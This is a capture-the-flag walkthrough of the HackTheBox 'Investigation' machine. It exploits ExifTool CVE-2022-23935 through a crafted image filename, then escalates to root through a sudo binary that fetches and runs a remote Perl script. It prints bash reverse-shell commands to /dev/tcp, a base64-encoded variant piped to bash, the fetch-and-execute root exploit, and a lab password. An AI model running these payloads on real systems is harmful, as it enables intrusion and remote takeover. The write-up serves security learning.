HackTheBox "Investigation"

April 19th, 2023

Introduction

Investigation is a medium box released on January 21st, 2023 by Derezzed.

User Own

Nmap scan:

Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-19 14:02 EDT
Nmap scan report for 10.10.11.197
Host is up (0.033s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 2f1e6306aa6ebbcc0d19d4152674c6d9 (RSA)
|   256 274520add2faa73a8373d97c79abf30b (ECDSA)
|_  256 4245eb916e21020617b2748bc5834fe0 (ED25519)
80/tcp open  http    Apache httpd 2.4.41
|_http-title: Did not follow redirect to http://eforenzics.htb/
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: Host: eforenzics.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.79 seconds

The website has a file upload that will take an image file and return a text file of the detailed contents of the uploaded image.

Example Output

ExifTool Version Number         : 12.37
File Name                       : test.png
Directory                       : .
File Size                       : 384 bytes
File Modification Date/Time     : 2023:04:19 18:06:38+00:00
File Access Date/Time           : 2023:04:19 18:06:38+00:00
File Inode Change Date/Time     : 2023:04:19 18:06:38+00:00
File Permissions                : -rw-r--r--
File Type                       : PNG
File Type Extension             : png
MIME Type                       : image/png
Image Width                     : 200
Image Height                    : 150
Bit Depth                       : 4
Color Type                      : Palette
Compression                     : Deflate/Inflate
Filter                          : Adaptive
Interlace                       : Noninterlaced
Gamma                           : 2.2
White Point X                   : 0.3127
White Point Y                   : 0.329
Red X                           : 0.64
Red Y                           : 0.33
Green X                         : 0.3
Green Y                         : 0.6
Blue X                          : 0.15
Blue Y                          : 0.06
Palette                         : (Binary data 24 bytes, use -b option to extract)
Background Color                : 0
Modify Date                     : 2022:08:10 03:53:15
Warning                         : [minor] Text/EXIF chunk(s) found after PNG IDAT (may be ignored by some readers)
Datecreate                      : 2022-08-10T03:53:15+00:00
Datemodify                      : 2022-08-10T03:53:15+00:00
Image Size                      : 200x150
Megapixels                      : 0.030

According to the output, the tool used to gather the image details is ExifTool 12.37. This version of ExifTool is vulnerable to CVE-2022-23935. We can rename a .jpg or .png file to be a command that would give us a reverse shell, like bash -i >& /dev/tcp/10.0.x.x/1234 0>&1, but we can't have forward slashes in the filename. We can bypass this issue by encoding the reverse shell in Base64, and then decoding on the machine using the command echo L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLngueC8xMjM0IDA+JjE= | base64 -d | bash |. The Base64 encoded string contains the bash reverse shell that the server will run when the image is uploaded.

After gaining a reverse shell, we are logged in as www-data. Checking /etc/passwd reveals one user named smorton. Attempting to find anything owned by smorton reveals a .msg file.

find / -user smorton 2>/dev/null
/home/smorton
/usr/local/investigation/Windows Event Logs for Analysis.msg

We can download this file by using the command cp "Windows Event Logs for Analysis.msg" /var/www/html/analysed_images/w.msg and then going to the link http://eforenzics.htb/analysed_images/w.msg.

This .msg file is supposed to be opened with Outlook. We can convert this to a .eml with msgconvert and open it in Thunderbird.

Hi Steve,

Can you look through these logs to see if our analysts have been logging on to the inspection terminal. I'm concerned that they are moving data on to production without following our data transfer procedures. 

Regards.
Tom

Attached to this email is evtx-logs.zip. Inside is security.evtx. The file format .evtx is a Microsoft Windows event log, which can be opened with Event Viewer in Windows.

From HackTricks, security logs can contain useful artifacts. Filtering the log with event ID 4625, we can see when someone tried to login but failed.

This log shows that someone accidentally used their password as their username. Logs afterward show that the user SMorton logged in successfully shortly after the failed login attempt, which means the password most likely belongs to him. Using the password Def@ultf0r3nz!csPa$$ to login to smorton through SSH gets us in, which gets us the user.txt flag.

System Own

sudo -l reveals:

Matching Defaults entries for smorton on investigation:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User smorton may run the following commands on investigation:
    (root) NOPASSWD: /usr/bin/binary

Running /usr/bin/binary doesn't seem to do anything:

sudo /usr/bin/binary
Exiting...

Let's get this binary file for decompilation.

scp [email protected]:/usr/bin/binary ~/Documents/binary

We can use a simple decompiler like Decompiler Explorer to see our code. The most accurate code output is from BinaryNinja:

int32_t main(int32_t argc, char** argv, char** envp)
{
    if (argc != 3)
    {
        puts("Exiting... ");
        exit(0);
        /* no return */
    }
    if (getuid() != 0)
    {
        puts("Exiting... ");
        exit(0);
        /* no return */
    }
    if (strcmp(argv[2], "lDnxUysaQn") != 0)
    {
        puts("Exiting... ");
        exit(0);
        /* no return */
    }
    puts("Running... ");
    FILE* rax_8 = fopen(argv[2], &data_2027);
    int64_t rax_9 = curl_easy_init();
    int32_t var_40 = 0x2712;
    curl_easy_setopt(rax_9, 0x2712, argv[1], 0x2712);
    int32_t var_3c = 0x2711;
    curl_easy_setopt(rax_9, 0x2711, rax_8, 0x2711);
    int32_t var_38 = 0x2d;
    curl_easy_setopt(rax_9, 0x2d, 1, 0x2d);
    if (curl_easy_perform(rax_9) != 0)
    {
        puts("Exiting... ");
        exit(0);
        /* no return */
    }
    int64_t rax_25 = snprintf(nullptr, 0, &data_202a, argv[2]);
    char* rax_28 = malloc((rax_25 + 1));
    snprintf(rax_28, (rax_25 + 1), &data_202a, argv[2]);
    int64_t rax_37 = snprintf(nullptr, 0, "perl ./%s", rax_28);
    char* rax_40 = malloc((rax_37 + 1));
    snprintf(rax_40, (rax_37 + 1), "perl ./%s", rax_28);
    fclose(rax_8);
    curl_easy_cleanup(rax_9);
    setuid(0);
    system(rax_40);
    system("rm -f ./lDnxUysaQn");
    return 0;
}

The program has a couple checks to make sure we use it correctly.

Firstly, the program checks if we have 3 arguments at line 3. If we don't have 3 arguments, we cannot pass. We would get pass this check by doing sudo /usr/bin/binary arg2 arg3. The first argument in C is always the program itself.

Secondly, The program checks if our user ID is 0 at line 9. Since we are using sudo, we automatically pass this check (root's user ID is 0).

Thirdly, the program checks if our third argument equals lDnxUysaQn at line 15. Our statement now looks like sudo /usr/bin/binary arg2 lDnxUysaQn.

After all these checks, the program initializes cURL at line 23 and sets the URL as the second argument at line 25. It then retrieves the file from the specified URL at line 30 and writes it to a temporary file called lDnxUysaQn. The program then runs this file with Perl as root at line 45. This means we can feed this program a Perl reverse shell as the first argument and get in as root.

Terminal 1

python3 -m http.server 80

Terminal 2

smorton@investigation:/tmp$ sudo /usr/bin/binary http://10.10.xx.xx/rev.pl lDnxUysaQn
Running...
Content-Length: 0
Connection: close
Content-Type: text/html

smorton@investigation:/tmp$ Content-Length: 42
Connection: close
Content-Type: text/html

Sent reverse shell to 10.10.xx.xx:1234<p>

Terminal 3

nc -nvlp 1234             
listening on [any] 1234 ...
connect to [10.10.xx.xx] from (UNKNOWN) [10.10.11.197] 47318
 03:30:49 up 23:12,  2 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
smorton  pts/2    10.10.xx.xx      02:13    1:07m  0.18s  0.18s -bash
smorton  pts/0    10.10.xx.xx      02:40    0.00s  0.15s  0.15s -bash
Linux investigation 5.4.0-137-generic #154-Ubuntu SMP Thu Jan 5 17:03:22 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
uid=0(root) gid=0(root) groups=0(root)
/
/usr/sbin/apache: 0: can't access tty; job control turned off
# cat /root/root.txt
[ROOT FLAG HERE]

And that's the box!

PreviousTryHackMe "Simple CTF"NextHackTheBox "Inject"

Last updated 2 years ago